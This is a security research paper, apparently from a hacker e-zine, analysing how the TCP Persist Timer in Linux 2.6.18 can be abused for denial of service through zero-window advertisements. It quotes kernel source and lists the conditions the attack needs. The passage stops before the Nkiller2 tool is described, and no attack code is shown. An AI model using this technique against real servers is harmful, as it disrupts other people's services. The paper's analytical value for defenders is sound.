|=-----------------------------------------------------------------------=|
|=--------=[ Exploiting TCP and the Persist Timer Infiniteness ]=--------=|
|=-----------------------------------------------------------------------=|
|=---------------=[    By ithilgore                      ]=--------------=|
|=---------------=[       sock-raw.org                   ]=--------------=|
|=---------------=[                                      ]=--------------=|
|=---------------=[    ithilgore.ryu.L@gmail.com         ]=--------------=|
|=-----------------------------------------------------------------------=|


---[ Contents

   1 - Introduction

   2 - TCP Persist Timer Theory

   3 - TCP Persist Timer implementation 
     3.1 - TCP Timers Initialization
     3.2 - Persist Timer Triggering
     3.3 - Inner workings of Persist Timer

   4 - The attack
     4.1 - Kernel memory exhaustion pitfalls
     4.2 - Attack Vector
     4.3 - Test cases

   5 - Nkiller2 implementation

   6 - References
  
  
--[ 1 - Introduction 

TCP is the main protocol upon which most end-to-end communications take
place, nowadays. Being introduced a lot of years ago, where security
wasn't as much a concern, has left it with quite a few hanging
vulnerabilities. It is not strange that many TCP implementations have
deviated from the official RFCs, to provide additional protective
measures and robustness. However, there are still attack vectors which
can be exploited. One of them is the Persist Timer, which is triggered
when the receiver advertises a TCP window of size 0. In the following
text, we are going to analyse, how an old technique of kernel memory
exhaustion [1] can be amplified, extended and adjusted to other forms of
attacks, by exploiting the persist timer functionality. Our analysis is 
mainly going to focus on the Linux (2.6.18) network stack implementation,
but test cases for *BSD will be included as well. The possibility of 
exploiting the TCP Persist Timer, was first mentioned at [2].
A proof-of-concept tool that was developed for the sole purpose of
demonstrating the above attack will be presented. Nkiller2 is able to 
perform a generic DoS attack, completely statelessly and with almost no 
memory overhead, using packet-parsing techniques and virtual states. In
addition, the amount of traffic created is far less than that of similar
tools, due to the attack's nature. The main advantage, that makes all the
difference, is the possibly unlimited prolonging of the DoS attack's
impact by the exploitation of a perfectly 'expected & normal' TCP Persist
Timer behaviour.


--[ 2 - TCP Persist Timer theory 

TCP is based on many timers. One of them is the Persist Timer, which is
used when the peer advertises a window of size 0. Normally, the receiver
advertises a zero window, when TCP hasn't pushed the buffered data to the
user application and thus the kernel buffers reach their initial
advertised limit. This forces the TCP sender to stop writing data to the
network, until the receiver advertises a window which has a value greater
than zero. To accomplish that, the receiver sends an ACK called a window
update, which has the same acknowledgment number as the one that
advertised the 0 window (since no new data is effectively acknowledged).

The Persist Timer is triggered when TCP gets a 0 window advertisement for
the following reason: Suppose the receiver eventually pushes the data
from the kernel buffers to the user application, and thus opens the
window (the right edge is advanced). He then sends a window update to the
sender announcing that it can now receive new data. If this window update
is lost for any reason, then both ends of the connection would deadlock,
since the receiver would wait for new data and the sender would wait for
the now lost window update. To avoid the above situation, the sender
sets the Perist Timer and if no window update has reached him until it
expires, then he resends a probe to the peer. As long as the receiver
keeps advertising a window of size 0, then the sender follows the process
again. He sets the timer, waits for the window update and resends the
probe. As long as some of the probes are acknowledged, without necessarily
having to announce a new window, the process will go on ad infinitum.
Examples can be found at [3].

Of course, the actual implementation is always more complicated than
theory. We are going to inspect the Linux implementation of the
TCP Persist Timer, watch the intricacies unfold and eventually get a
fairly good perspective on what happens behind the scenes.


-- [ 3 - TCP Persist Timer implementation 

The following code inspection will mainly focus on the implementation of 
the TCP Persist Timer on Linux 2.6.18. Many of the TCP kernel functions 
will be regarded as black-boxes, as their analysis is beyond the scope of
this paper and would probably require a book by itself. 


----[ 3.1 - TCP Timer Initialization

Let's see when and how the main TCP timers are initialized. During the
socket creation process tcp_v4_init_sock() will call 
tcp_init_xmit_timers() which in turn calls inet_csk_init_xmit_timers().


net/ipv4/tcp_ipv4.c:
/---------------------------------------------------------------------\

/* NOTE: A lot of things set to zero explicitly by call to
 *       sk_alloc() so need not be done here.
 */
static int tcp_v4_init_sock(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    struct tcp_sock *tp = tcp_sk(sk);

    skb_queue_head_init(&tp->out_of_order_queue);
    tcp_init_xmit_timers(sk);
    /* ... */

}

\---------------------------------------------------------------------/


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

void tcp_init_xmit_timers(struct sock *sk)
{
    inet_csk_init_xmit_timers(sk, &tcp_write_timer, &tcp_delack_timer,
                  &tcp_keepalive_timer);
}

\---------------------------------------------------------------------/


As we can see, inet_csk_init_xmit_timers() is the function which actually
does the work of setting up the timers. Essentially what it does, is to
assign a handler function to each of the three main timers, as instructed
by its arguments. setup_timer() is a simple inline function defined at
"include/linux/timer.h".


net/ipv4/inet_connection_sock.c:
/---------------------------------------------------------------------\

/*
 * Using different timers for retransmit, delayed acks and probes
 * We may wish use just one timer maintaining a list of expire jiffies
 * to optimize.
 */
void inet_csk_init_xmit_timers(struct sock *sk,
                   void (*retransmit_handler)(unsigned long),
                   void (*delack_handler)(unsigned long),
                   void (*keepalive_handler)(unsigned long))
{
    struct inet_connection_sock *icsk = inet_csk(sk);

    setup_timer(&icsk->icsk_retransmit_timer, retransmit_handler,
            (unsigned long)sk);
    setup_timer(&icsk->icsk_delack_timer, delack_handler,
            (unsigned long)sk);
    setup_timer(&sk->sk_timer, keepalive_handler, (unsigned long)sk);
    icsk->icsk_pending = icsk->icsk_ack.pending = 0;
}

\---------------------------------------------------------------------/


include/linux/timer.h:
/---------------------------------------------------------------------\

static inline void setup_timer(struct timer_list * timer,
                void (*function)(unsigned long),
                unsigned long data)
{
    timer->function = function;
    timer->data = data;
    init_timer(timer);
}

\---------------------------------------------------------------------/


According to the above, the timers will be initialized with the following
handlers:

retransmission timer -> tcp_write_timer()
delayed acknowledgments timer -> tcp_delack_timer()
keepalive timer -> tcp_keepalive_timer()

What interests us, is the tcp_write_timer(), since as we can see from the
following code, *both* the retransmission timer *and* the persist timer
are initially handled by the same function before triggering the more
specific ones. And there is a reason that Linux ties the two timers.


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

static void tcp_write_timer(unsigned long data)
{
    struct sock *sk = (struct sock*)data;
    struct inet_connection_sock *icsk = inet_csk(sk);
    int event;

    bh_lock_sock(sk);
    if (sock_owned_by_user(sk)) {
        /* Try again later */
        sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
            jiffies + (HZ / 20));
        goto out_unlock;
    }

    if (sk->sk_state == TCP_CLOSE || !icsk->icsk_pending)
        goto out;

    if (time_after(icsk->icsk_timeout, jiffies)) {
        sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
            icsk->icsk_timeout);
        goto out;
    }

    event = icsk->icsk_pending;
    icsk->icsk_pending = 0;

    switch (event) {
    case ICSK_TIME_RETRANS:
        tcp_retransmit_timer(sk);
        break;
    case ICSK_TIME_PROBE0:
        tcp_probe_timer(sk);
        break;
    }
    TCP_CHECK_TIMER(sk);

out:
    sk_mem_reclaim(sk);
out_unlock:
    bh_unlock_sock(sk);
    sock_put(sk);
}

\---------------------------------------------------------------------/


Depending on the value of 'icsk->icsk_pending', then either the 
retransmission_timer real handler -tcp_retransmit_timer()- or the 
persist_timer real handler -tcp_probe_timer()- is called. 
ICSK_TIME_RETRANS and ICSK_TIME_PROBE0 are literals defined at 
"include/net/inet_connection_sock.h" and icsk_pending is an 8bit member
of a type inet_sock struct which is defined in the same file.


include/net/inet_connection_sock.h:
/---------------------------------------------------------------------\

/** inet_connection_sock - INET connection oriented sock
 *
 * @icsk_pending:      Scheduled timer event
 * ...
 *
 */

struct inet_connection_sock {
    /* inet_sock has to be the first member! */
    struct inet_sock      icsk_inet;
    /* ... */
    __u8              icsk_pending;

    /* ...*/
}

/* ... */

#define ICSK_TIME_RETRANS   1   /* Retransmit timer */
#define ICSK_TIME_DACK      2   /* Delayed ack timer */
#define ICSK_TIME_PROBE0    3   /* Zero window probe timer */
#define ICSK_TIME_KEEPOPEN  4   /* Keepalive timer */

\----------------------------------------------------------------------/


Leaving the initialization process behind, we need to see how we can
trigger the TCP persist timer.


----[ 3.2 - Persist Timer Triggering

Looking through the kernel code for functions that trigger/reset the 
timers, we fall upon inet_csk_reset_xmit_timer() which is defined at
"include/net/inet_connection_sock.h"


include/net/inet_connection_sock.h:
/---------------------------------------------------------------------\

/*
 *  Reset the retransmission timer
 */
static inline void inet_csk_reset_xmit_timer(struct sock *sk,
                         const int what,
                         unsigned long when,
                         const unsigned long max_when)
{
    struct inet_connection_sock *icsk = inet_csk(sk);

    if (when > max_when) {
#ifdef INET_CSK_DEBUG
        pr_debug("reset_xmit_timer: sk=%p %d when=0x%lx, 
            caller=%p\n", sk, what, when, 
            current_text_addr());
#endif
        when = max_when;
    }

    if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBE0) {
        icsk->icsk_pending = what;
        icsk->icsk_timeout = jiffies + when;
        sk_reset_timer(sk, &icsk->icsk_retransmit_timer,
                icsk->icsk_timeout);
    } else if (what == ICSK_TIME_DACK) {
        icsk->icsk_ack.pending |= ICSK_ACK_TIMER;
        icsk->icsk_ack.timeout = jiffies + when;
        sk_reset_timer(sk, &icsk->icsk_delack_timer, 
                icsk->icsk_ack.timeout);
    }
#ifdef INET_CSK_DEBUG
    else {
        pr_debug("%s", inet_csk_timer_bug_msg);
    }
#endif
}

\----------------------------------------------------------------------/


An assignment to 'icsk->icsk_pending' is made according to the argument
'what'. Note the ambiguity of the comment mentioning that the
retransmission timer is reset. Essentially, however, either the persist
timer or the retransmission can be reset through this function. In
addition, the delayed acknowledgement timer, which won't interest us, can
be reset through the ICSK_TIME_DACK value. So, whenever 
inet_csk_reset_xmit_timer() is called, it sets the corresponding timer,
as instructed by argument 'what', to fire up after time 'when' (which
must be less or equal than 'max_when') has passed. jiffies is a global
variable which shows the current system uptime in terms of clock ticks
A good reference, on how timers in general are managed, is [4]. 
A caller function which sets the argument 'what' as ICSK_TIME_PROBE0 is
tcp_check_probe_timer().


include/net/tcp.h:
/---------------------------------------------------------------------\

static inline void tcp_check_probe_timer(struct sock *sk, 
                        struct tcp_sock *tp)
{
    const struct inet_connection_sock *icsk = inet_csk(sk);
    if (!tp->packets_out && !icsk->icsk_pending)
        inet_csk_reset_xmit_timer(sk, ICSK_TIME_PROBE0,
                      icsk->icsk_rto, TCP_RTO_MAX);
}

\----------------------------------------------------------------------/


We face two problems before the persist timer can be triggered. First we
need to pass the check of the if condition in tcp_check_probe_timer():

    if (!tp->packets_out && !icsk->icsk_pending)

tp->packets_out denotes if any packets are in flight and have not yet
been acknowledged. This means that the advertisement of a 0 window must
happen after any data we have received has been acknowledged by us (as 
the receiver) and before the sender starts transmitting any new data.
The fact that icsk->icsk_pending should be, 0 denotes that any other timer
has to already have been cleared. This can happen through the function
inet_csk_clear_xmit_timer() which in our case can be called by
tcp_ack_packets_out() which is called by tcp_clean_rtx_queue() which is
called by tcp_ack() which is the main function that deals with incoming
acks. tcp_ack() is called by tcp_rcv_established(), in turn called by
tcp_v4_do_rcv(). The only limitation again for tcp_ack_packets_out() to
call the timer clearing function, is that 'tp->packets_out' should be 0.


net/include/inet_connection_sock.h
/---------------------------------------------------------------------\

static inline void inet_csk_clear_xmit_timer(struct sock *sk, 
                        const int what)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    
    if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBE0) {
        icsk->icsk_pending = 0;
#ifdef INET_CSK_CLEAR_TIMERS
        sk_stop_timer(sk, &icsk->icsk_retransmit_timer);
#endif
    /* ... */
}

\----------------------------------------------------------------------/


net/ipv4/tcp_input.c
/---------------------------------------------------------------------\

static void tcp_ack_packets_out(struct sock *sk, struct tcp_sock *tp)
{
    if (!tp->packets_out) {
        inet_csk_clear_xmit_timer(sk, ICSK_TIME_RETRANS);
    } else {
        inet_csk_reset_xmit_timer(sk, ICSK_TIME_RETRANS, 
            inet_csk(sk)->icsk_rto, TCP_RTO_MAX);
    }
}

/* ... */

/* Remove acknowledged frames from the retransmission queue. */
static int tcp_clean_rtx_queue(struct sock *sk, __s32 *seq_rtt_p)
{

/* ... */
    if (acked&FLAG_ACKED) {
        tcp_ack_update_rtt(sk, acked, seq_rtt);
        tcp_ack_packets_out(sk, tp);
        /* ... */
    }
/* ... */

}

/* ... */

/* This routine deals with incoming acks, but not outgoing ones. */
static int tcp_ack(struct sock *sk, struct sk_buff *skb, int flag)
{

/* ... */

    /* See if we can take anything off of the retransmit queue. */
    flag |= tcp_clean_rtx_queue(sk, &seq_rtt);
/* ... */

}

\----------------------------------------------------------------------/


The only caller for tcp_check_probe_timer() is __tcp_push_pending_frames()
which has tcp_push_pending_frames as its wrapper function.
tcp_push_sending_frames() is called by tcp_data_snd_check() which is
called by tcp_rcv_established() which as we saw above calls tcp_ack() as
well.


include/net/tcp.h:
/---------------------------------------------------------------------\

void __tcp_push_pending_frames(struct sock *sk, struct tcp_sock *tp,
                   unsigned int cur_mss, int nonagle)
{
    struct sk_buff *skb = sk->sk_send_head;

    if (skb) {
        if (tcp_write_xmit(sk, cur_mss, nonagle))
            tcp_check_probe_timer(sk, tp);
    }
}

/* ... */

static inline void tcp_push_pending_frames(struct sock *sk,
                       struct tcp_sock *tp)
{
    __tcp_push_pending_frames(sk, tp, tcp_current_mss(sk, 1),
                    tp->nonagle);
}

\----------------------------------------------------------------------/


Another problem here is that we have to make tcp_write_xmit() return a
value different than 0. According to the comments and the last line of
the function, the only way to return 1 is by having no packets
unacknowledged (which are in flight) and additionally by having more 
packets that need to be sent on queue. This means that the data we
requested needs to be larger than the initial mss, so that at least 2
packets are needed to be sent. The first will be acknowledged by us
advertising a zero window at the same time, and after that, there will
still be at least 1 packet left in the sender queue. There is also the
chance, that we advertise a zero window before the sender even starts
sending any data, just after the connection establishment phase, but
we will see later that this is not a really good practice.


net/ipv4/tcp_output.c:
/---------------------------------------------------------------------\

/* This routine writes packets to the network.  It advances the
 * send_head.  This happens as incoming acks open up the remote
 * window for us.
 *
 * Returns 1, if no segments are in flight and we have queued segments,
 * but cannot send anything now because of SWS or another problem.
 */
static int tcp_write_xmit(struct sock *sk, unsigned int mss_now, 
                int nonagle)
{
    struct tcp_sock *tp = tcp_sk(sk);
    struct sk_buff *skb;
    unsigned int tso_segs, sent_pkts;
    int cwnd_quota;
    int result;

    /* If we are closed, the bytes will have to remain here.
     * In time closedown will finish, we empty the write queue and
     * all will be happy.
     */
    if (unlikely(sk->sk_state == TCP_CLOSE))
        return 0;

    sent_pkts = 0;

    /* Do MTU probing. */
    if ((result = tcp_mtu_probe(sk)) == 0) {
        return 0;
    } else if (result > 0) {
        sent_pkts = 1;
    }

    while ((skb = sk->sk_send_head)) {
        unsigned int limit;

        tso_segs = tcp_init_tso_segs(sk, skb, mss_now);
        BUG_ON(!tso_segs);

        cwnd_quota = tcp_cwnd_test(tp, skb);
        if (!cwnd_quota)
            break;

        if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now)))
            break;

        if (tso_segs == 1) {
            if (unlikely(!tcp_nagle_test(tp, skb, mss_now,
                (tcp_skb_is_last(sk, skb) ?
                nonagle : TCP_NAGLE_PUSH))))
                break;
        } else {
            if (tcp_tso_should_defer(sk, tp, skb))
                break;
        }

        limit = mss_now;
        if (tso_segs > 1) {
            limit = tcp_window_allows(tp, skb,
                          mss_now, cwnd_quota);

            if (skb->len < limit) {
                unsigned int trim = skb->len % mss_now;

                if (trim)
                    limit = skb->len - trim;
            }
        }

        if (skb->len > limit &&
            unlikely(tso_fragment(sk, skb, limit, mss_now)))
            break;

        TCP_SKB_CB(skb)->when = tcp_time_stamp;

        if (unlikely(tcp_transmit_skb(sk, skb, 1, GFP_ATOMIC)))
            break;

        /* Advance the send_head.  This one is sent out.
         * This call will increment packets_out.
         */
        update_send_head(sk, tp, skb);

        tcp_minshall_update(tp, mss_now, skb);
        sent_pkts++;
    }

    if (likely(sent_pkts)) {
        tcp_cwnd_validate(sk, tp);
        return 0;
    }
    return !tp->packets_out && sk->sk_send_head;
}

\----------------------------------------------------------------------/


Looking through tcp_write_xmit(), we can deduce that the only way to make
it return a value different than 0, is by reaching the last line and at
the same meeting the above two requirements. Consequently, we need to
break from the while loop before 'sent_pkts' is increased so that the if
condition which calls tcp_cwnd_validate() and then causes the function
to return 0, fails the check. The key is these two lines:

        if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now)))
            break;

tcp_snd_wnd_test() is defined as follows:

net/ipv4/tcp_output.c
/---------------------------------------------------------------------\

/* Does at least the first segment of SKB fit into the send window? */
static inline int tcp_snd_wnd_test(struct tcp_sock *tp, 
    struct sk_buff *skb, unsigned int cur_mss)
{
    u32 end_seq = TCP_SKB_CB(skb)->end_seq;

    if (skb->len > cur_mss)
        end_seq = TCP_SKB_CB(skb)->seq + cur_mss;

    return !after(end_seq, tp->snd_una + tp->snd_wnd);
}

\---------------------------------------------------------------------/


To clarify a few things, here is an excerpt from tcp.h which defines the
macro 'after' and the members of struct tcp_skb_cb which are used inside
tcp_snd_wnd_test(). 


include/net/tcp.h:
/---------------------------------------------------------------------\

/*
 * The next routines deal with comparing 32 bit unsigned ints
 * and worry about wraparound (automatic with unsigned arithmetic).
 */

static inline int before(__u32 seq1, __u32 seq2)
{
        return (__s32)(seq1-seq2) < 0;
}
#define after(seq2, seq1)   before(seq1, seq2)

/* ... */

struct tcp_skb_cb {
    union {
        struct inet_skb_parm    h4;
#if defined(CONFIG_IPV6) || defined (CONFIG_IPV6_MODULE)
        struct inet6_skb_parm   h6;
#endif
    } header;   /* For incoming frames      */
    __u32       seq;        /* Starting sequence number */
    __u32       end_seq;    /* SEQ + FIN + SYN + datalen    */
    
    /* ... */

    __u32       ack_seq;    /* Sequence number ACK'd    */
};

#define TCP_SKB_CB(__skb)   ((struct tcp_skb_cb *)&((__skb)->cb[0]))

\---------------------------------------------------------------------/


So, in theory we need the sequence number which is derived from the sum
of the current sequence number + the datalength, to be more than the sum
of the number of unacknowledged data + the send window. A diagram from
RFC 793 helps clear out some things:

                   1         2          3          4      
              ----------|----------|----------|---------- 
                     SND.UNA    SND.NXT    SND.UNA        
                                          +SND.WND        

        1 - old sequence numbers which have been acknowledged  
        2 - sequence numbers of unacknowledged data            
        3 - sequence numbers allowed for new data transmission 
        4 - future sequence numbers which are not yet allowed  

In practice, the fact the we, as receivers, just advertised a window of
size 0, makes the snd_wnd 0, which in turn leads the above check in
succeeding. Things just work by themselves here.

For completeness, we mention that the window is updated by calling the
function tcp_ack_update_window() (caller is tcp_ack()) which in turns
updates the tp->snd_wnd variable if the window update is a valid one,
something which is checked by tcp_may_update_window().


net/ipv4/tcp_input.c
/---------------------------------------------------------------------\

/* Check that window update is acceptable.
 * The function assumes that snd_una<=ack<=snd_next.
 */
static inline int tcp_may_update_window(const struct tcp_sock *tp, 
    const u32 ack, const u32 ack_seq, const u32 nwin)
{
    return (after(ack, tp->snd_una) ||
        after(ack_seq, tp->snd_wl1) ||
        (ack_seq == tp->snd_wl1 && nwin > tp->snd_wnd));
}

/* ... */

/* Update our send window.
 *
 * Window update algorithm, described in RFC793/RFC1122 (used in 
 * linux-2.2 and in FreeBSD. NetBSD's one is even worse.) is wrong.
 */
static int tcp_ack_update_window(struct sock *sk, struct tcp_sock *tp,
                 struct sk_buff *skb, u32 ack, 
                 u32 ack_seq)
{
    int flag = 0;
    u32 nwin = ntohs(skb->h.th->window);

    if (likely(!skb->h.th->syn))
        nwin <<= tp->rx_opt.snd_wscale;

    if (tcp_may_update_window(tp, ack, ack_seq, nwin)) {
        flag |= FLAG_WIN_UPDATE;
        tcp_update_wl(tp, ack, ack_seq);

        if (tp->snd_wnd != nwin) {
            tp->snd_wnd = nwin;
            /* ... */
        }
    }

    tp->snd_una = ack;

    return flag;
}

\---------------------------------------------------------------------/


Let's now summarize the above with a graphical representation.

attacker <-------- data --------- sender
attacker ---- ACK(data), win0 --> sender

What happens on the sender side:

tcp_v4_do_rcv()
   |
   |--> tcp_rcv_established()
          |
          |--> tcp_ack()
          |       |
          |       |--> tcp_ack_update_window() 
          |       |      | 
          |       |      |--> tcp_may_update_window()
          |       |      
          |       |--> tcp_clean_rtx_queue() 
          |              |
          |              |--> tcp_ack_packets_out()
          |                      |
          |                      |--> inet_csk_clear_xmit_timer()
          |         
          |--> tcp_data_snd_check()
                  |
                  |--> tcp_push_sending_frames()
                         |
                         |--> __tcp_push_sending_frames()
                                 |
                                 |--> tcp_write_xmit()
                                 |      |
                                 |      |--> tcp_snd_wnd_test()
                                 |               
                                 |--> tcp_check_probe_timer()
                                        |
                                        |--> inet_csk_reset_xmit_timer()


Time to move on to the more specific internals of the TCP Persist Timer
itself.


----[ 3.3 - Inner workings of Persist Timer

tcp_probe_timer() is the actual handler for the TCP persist timer so we
are going to focus on this one for a while.


net/ipv4/tcp_timer.c
/---------------------------------------------------------------------\

static void tcp_probe_timer(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    struct tcp_sock *tp = tcp_sk(sk);
    int max_probes;

    if (tp->packets_out || !sk->sk_send_head) {
        icsk->icsk_probes_out = 0;
        return;
    }

    /* *WARNING* RFC 1122 forbids this
     *
     * It doesn't AFAIK, because we kill the retransmit timer -AK
     *
     * FIXME: We ought not to do it, Solaris 2.5 actually has fixing
     * this behaviour in Solaris down as a bug fix. [AC]
     *
     * Let me to explain. icsk_probes_out is zeroed by incoming ACKs
     * even if they advertise zero window. Hence, connection is killed
     * only if we received no ACKs for normal connection timeout. It is
     * not killed only because window stays zero for some time, window
     * may be zero until armageddon and even later. We are in full
     * accordance with RFCs, only probe timer combines both
     * retransmission timeout and probe timeout in one bottle.  --ANK
     */
    max_probes = sysctl_tcp_retries2;

    if (sock_flag(sk, SOCK_DEAD)) {
        const int alive = ((icsk->icsk_rto << icsk->icsk_backoff)
            < TCP_RTO_MAX);
 
        max_probes = tcp_orphan_retries(sk, alive);

        if (tcp_out_of_resources(sk, alive || icsk->icsk_probes_out
            <= max_probes))
            return;
    }

    if (icsk->icsk_probes_out > max_probes) {
        tcp_write_err(sk);
    } else {
        /* Only send another probe if we didn't close things up. */
        tcp_send_probe0(sk);
    }
}

\---------------------------------------------------------------------/


Commenting on the comments, we stand before a kernel developer
disagreement on whether or not the implementation deviates from RFC 1122
(Requirements for Internet Hosts - Communication Layers). The most 
outstanding point, however, is this remark:

    "It is not killed only because window stays zero for some time, 
    window may be zero until armageddon and even later."

Indeed, this is part of what we are going to exploit. We shall take
advantage of a perfectly 'normal' TCP behaviour, for our own purpose.
Let's see how this works: 'max_probes' is assigned the value of
'sysctl_tcp_retries2' which is actually a userspace-controlled variable
from /proc/sys/net/ipv4/tcp_retries2 and which usually defaults to 15.

There are two cases from now on.
First case: SOCK_DEAD -> The socket is "dead" or "orphan" which usually
happens when the state of the connection is FIN_WAIT_1 or any other 
terminating state from the TCP state transition diagram (RFC 793).
In this case, 'max_probes' gets the value from tcp_orphan_retries() which
is defined as follows:


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

/* Calculate maximal number or retries on an orphaned socket. */
static int tcp_orphan_retries(struct sock *sk, int alive)
{
    int retries = sysctl_tcp_orphan_retries; /* May be zero. */

    /* We know from an ICMP that something is wrong. */
    if (sk->sk_err_soft && !alive)
        retries = 0;

    /* However, if socket sent something recently, select some safe
     * number of retries. 8 corresponds to >100 seconds with minimal
     * RTO of 200msec. */
    if (retries == 0 && alive)
        retries = 8;
    return retries;

\---------------------------------------------------------------------/


The 'alive' variable is calculated from this line:

        const int alive = ((icsk->icsk_rto << icsk->icsk_backoff)
            < TCP_RTO_MAX);

TCP_RTO_MAX is the maximum value the retransmission timeout can get
and is defined at:


include/net/tcp.h:
/---------------------------------------------------------------------\

#define TCP_RTO_MAX ((unsigned)(120*HZ))

\---------------------------------------------------------------------/


HZ is the tick rate frequency of the system, which means a period of
1/HZ seconds is assumed. Regardless of the value of HZ (which is
varies from one architecture to another), anything that is multiplied
by it, is transformed to a product of seconds [4]. For example, 120*HZ is
translated to 120 seconds since we are going to have HZ timer interrupts
per second.

Consequently, if the retransmission timeout is less than the maximum 
allowed value of 2 minutes, then 'alive' = 1 and tcp_orphan_retries will
return 8, even if sysctl_tcp_orphan_retries is defined as 0 (which is
usually the case as one can see from the proc virtual filesystem:
/proc/sys/net/ipv4/tcp_orphan_retries). Keep in mind, however that the RTO
(retransmission timeout) is a dynamically computed value, varying when,
for example, traffic congestion occurs.

Practically, the case of a socket being dead is when the user application
has been requested a small amount of data from the peer. It can then write
the data all at once and issue a close(2) on the socket. This will result
on a transition from TCP_ESTALISHED to TCP_FIN_WAIT_1. Normally and
according to RFC 793, the state FIN_WAIT_1 automatically involves sending
a FIN (doing an active close) to the peer. However Linux breaks the
official TCP state machine, and will queue this small amount of data,
sending the FIN only when all of it has been acknowledged.


net/ipv4/tcp.c:
/---------------------------------------------------------------------\

void tcp_close(struct sock *sk, long timeout)
{
/* ... */
        
        /* RED-PEN. Formally speaking, we have broken TCP state
         * machine. State transitions:
         *
         * TCP_ESTABLISHED -> TCP_FIN_WAIT1
         * TCP_SYN_RECV -> TCP_FIN_WAIT1 (forget it, it's impossible)
         * TCP_CLOSE_WAIT -> TCP_LAST_ACK
         *
         * are legal only when FIN has been sent (i.e. in window),
         * rather than queued out of window. Purists blame.
         *
         * F.e. "RFC state" is ESTABLISHED,
         * if Linux state is FIN-WAIT-1, but FIN is still not sent.

         * F.e. "RFC state" is ESTABLISHED,
         * if Linux state is FIN-WAIT-1, but FIN is still not sent.
         * ...
         */
/* ... */
}

\---------------------------------------------------------------------/


Second Case: socket not dead -> in this case 'max_probes' keeps having
the default value from 'tcp_retries2'. 

'icsk->icsk_probes_out' stores the number of zero window probes so far.
Its value is compared to 'max_probes' and if greater, tcp_write_err()
is called, which will shutdown the corresponding socket (TCP_CLOSE state).
If not, then a zero window probe is sent with tcp_send_probe0().

    if (icsk->icsk_probes_out > max_probes) {
        tcp_write_err(sk);
    } else {
        /* Only send another probe if we didn't close things up. */
        tcp_send_probe0(sk);

One important factor here is the 'icsk_probes_out' "regeneration" which
takes place whenever we send an ACK, regardless of whether this ACK
opens the window or keeps it zero. tcp_ack() from tcp_input.c has a 
line which assigns 0 to 'icsk_probes_out': 

    no_queue:
        icsk->icsk_probes_out = 0;


We mentioned earlier that the TCP Retransmission Timer functionality is
loosely tied to the Persist Timer. Indeed, the connecting "circle" between
them is the 'tcp_retries2' variable. Also, remember the comment from
above:

    /* ...
     * We are in full accordance with RFCs, only probe timer combines both
     * retransmission timeout and probe timeout in one bottle.  --ANK
     */

tcp_retransmit_timer() calls tcp_write_timeout(), as part of it's checking
procedures, which in turns follows a logic similar to the one we saw above
in the Persist Timer paradigm. We can see that 'tcp_retries2' plays a
major role here, too. 


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

/*
 *  The TCP retransmit timer.
 */

static void tcp_retransmit_timer(struct sock *sk)
{
/* ... */
`
    if (tcp_write_timeout(sk))
        goto out;
/* ... */
}

/* ... */

/* A write timeout has occurred. Process the after effects. */
static int tcp_write_timeout(struct sock *sk)
{
    /* ... */

    retry_until = sysctl_tcp_retries2;
        if (sock_flag(sk, SOCK_DEAD)) {
            const int alive = (icsk->icsk_rto < TCP_RTO_MAX);
 
            retry_until = tcp_orphan_retries(sk, alive);

            if (tcp_out_of_resources(sk, alive || icsk->icsk_retransmits
                    < retry_until))
                return 1;
        }
    }

    if (icsk->icsk_retransmits >= retry_until) {
        /* Has it gone just too far? */
        tcp_write_err(sk);
        return 1;
    }

\---------------------------------------------------------------------/


The idea of combining the two timer algorithms is also mentioned in RFC
1122. Specifically, Section 4.2.2.17 - Probing Zero Windows states:

    "This procedure minimizes delay if the zero-window condition is due
    to a lost ACK segment containing a window-opening update. Exponential
    backoff is recommended, possibly with some maximum interval not
    specified here. This procedure is similar to that of the
    retransmission algorithm, and it may be possible to combine the two
    procedures in the implementation."

In addition, both OpenBSD and FreeBSD follow the notion of the timer
timeout combination. We can see this from the code excerpt below (OpenBSD
4.4).


sys/netinet/tcp_timer.c:
/---------------------------------------------------------------------\

void
tcp_timer_persist(void *arg)
{
    struct tcpcb *tp = arg;
    uint32_t rto;
    int s;

    s = splsoftnet();
    if ((tp->t_flags & TF_DEAD) ||
            TCP_TIMER_ISARMED(tp, TCPT_REXMT)) {
        splx(s);
        return;
    }
    tcpstat.tcps_persisttimeo++;
    /*
     * Hack: if the peer is dead/unreachable, we do not
     * time out if the window is closed.  After a full
     * backoff, drop the connection if the idle time
     * (no responses to probes) reaches the maximum
     * backoff that we would use if retransmitting.
     */
    rto = TCP_REXMTVAL(tp);
    if (rto < tp->t_rttmin)
        rto = tp->t_rttmin;
    if (tp->t_rxtshift == TCP_MAXRXTSHIFT &&
        ((tcp_now - tp->t_rcvtime) >= tcp_maxpersistidle ||
        (tcp_now - tp->t_rcvtime) >= rto * tcp_totbackoff)) {
        tcpstat.tcps_persistdrop++;
        tp = tcp_drop(tp, ETIMEDOUT);
        goto out;
    }
    tcp_setpersist(tp);
    tp->t_force = 1;
    (void) tcp_output(tp);
    tp->t_force = 0;
 out:
    splx(s);
}

\---------------------------------------------------------------------/


This of course doesn't mean that the timers are connected in any other
way. In fact, they are mutually exclusive, as when one of them is set
the other is cleared.

Summing up, to successfully trigger and later exploit the Persist Timer
the following prerequisites need to be met:

a) The amount of data requested needs to be big enough so that the 
userspace application cannot write the data all at once and issue a
close(2), thus going into FIN_WAIT_1 state and marking the socket as
SOCK_DEAD.

b) Assuming the default value of 'tcp_retries2', we need to send
an ACK (still advertising a 0 window though) at least every less than
15 persist timer probes. This will be long enough to reset 
'icsk_probes_out' back to zero and thus avoid the tcp_write_err()
pitfall.

c) The zero window advertisement will have to take place immediately
after acknowledging all the data in transit. This, of course, may include
piggybacking the ACK of the data, with the window advertisement.

It is now time to dive into the nitty-gritty details of the attack.


-- [ 4 - The attack

We are going to analyse the attack steps along with a tool that automates
the whole procedure, Nkiller2. Nkiller2 is a major expansion of the
original Nkiller I had written some time ago and which was based on the
